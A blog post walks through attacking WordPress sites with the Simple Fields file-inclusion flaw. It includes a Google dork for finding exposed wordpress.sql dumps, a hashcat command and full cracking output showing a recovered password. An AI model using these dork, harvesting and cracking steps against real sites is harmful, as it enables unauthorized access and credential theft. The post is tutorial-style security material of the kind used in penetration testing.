The Reality of Log Contamination

by Vince
in Blog
Hits: 1476

I came across a web site running a current version of WordPress with the Simple Fields plugin installed.  Searching Exploit-DB, I found:

WordPress Plugin Simple Fields 0.2 - 0.3.5 - Local/Remote File Inclusion / Remote Code Execution

“ This can even lead to remote code execution, for example by injecting php code into the apache logs or if allow_url_include is turned on in php.ini. ”

I’ve seen a lot of mistakes but I haven’t seen a change to the default permissions for access.log which is what you’d need for command injection off of log contamination.  You can absolutely inject into the logs, the entry will be there, you just won’t have the rights to read it with Local File Inclusion.  You can search for other logs looking for something world readable:

find / -name *.log –print –perm 644

I doubt you’ll find anything that you can contaminate correctly and read.  I could be wrong.  I did find incorrect file permissions on the wp-content folder and I even had access to the log files:

/wp-content/debug.log

Unfortunately, it doesn’t capture what we would want – you can read it but it’s useless for command execution. 

Moving on to Remote File Inclusion, if you look at the defaults for php.ini:

http://php.net/manual/en/ini.list.php

allow_url_include” is disabled by default.  Again, not something I’ve seen someone accidentally enabled.

Unless someone made a mistake, all you will get is LFI.  So what mistakes can we exploit? 

I’ve seen administrators and web developers set incorrect permissions on the www folder which can allow you to peer into places and files that wouldn’t be available to you under normal conditions.  I’ve also seen web developers package up the .sql file into the root folder of the website when moving the site from development to production.  On that latter point, the following Google Dork, generically searching for wordpress.sql, yields some interesting results:

intitle:"index of" "wordpress.sql" –contrib

With Local File Inclusion, I’d search for wordpress.sql, wp.sql, and the name of the site .sql – for example, if my site is:  myvulnerablewebsite.com, I’d search for myvulnerablewebsite.sql hoping to score some hashes.

If you do find an sql file, open it up, search for wp_users or user_pass and you should find some hashes that start off with $P$.  You can find a sample in the Hashcat example hashes.

Once you have the hash, you can try cracking it with:

hashcat64.exe –m 400 hash_file.txt mypasswordlist.txt

Your version of hashcat exe may vary but the rest of the syntax remains the same for cracking a WordPress hash.  Again, if we’re talking about mistakes, weak WordPress passwords are promising.  With a large list and a fast video card, I had this password cracked in one minute:

C:\hashcat>hashcat64.exe -m 400 wp_hash.txt final.txt
hashcat (v3.6.0) starting...

* Device #2: Not a native Intel OpenCL runtime. Expect massive speed loss.
             You can use --force to override, but do not report related errors.
OpenCL Platform #1: Advanced Micro Devices, Inc.
================================================
* Device #1: Hawaii, 4048/8192 MB allocatable, 44MCU
* Device #2: Intel(R) Xeon(R) CPU E5-1620 0 @ 3.60GHz, skipped.

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD

Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 75c

Dictionary cache hit:
* Filename..: final.txt
* Passwords.: 29925265
* Bytes.....: 311484373
* Keyspace..: 29925265
 

$P$BTo586nZRerHi2l77xuFFKwuf3Qq7t/:Elenita4212                          <<<-------------- SCORE!!!

Session..........: hashcat
Status...........: Cracked
Hash.Type........: phpass, WordPress (MD5), phpBB3 (MD5), Joomla (MD5)
Hash.Target......: $P$BTo586nZRerHi2l77xuFFKwuf3Qq7t/
Time.Started.....: Tue Jul 03 11:15:07 2018 (57 secs)
Time.Estimated...: Tue Jul 03 11:16:04 2018 (0 secs)
Guess.Base.......: File (final.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:   218.6 kH/s (11.66ms)
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 12255524/29925265 (40.95%)
Rejected.........: 292/12255524 (0.00%)
Restore.Point....: 11534613/29925265 (38.54%)
Candidates.#1....: e8cxkqyripfy -> extramints
HWMon.Dev.#1.....: Fan:  0% Util:  0% Core: 300MHz Mem: 150MHz Bus:16

Started: Tue Jul 03 11:15:05 2018
Stopped: Tue Jul 03 11:16:05 2018


Happy hunting!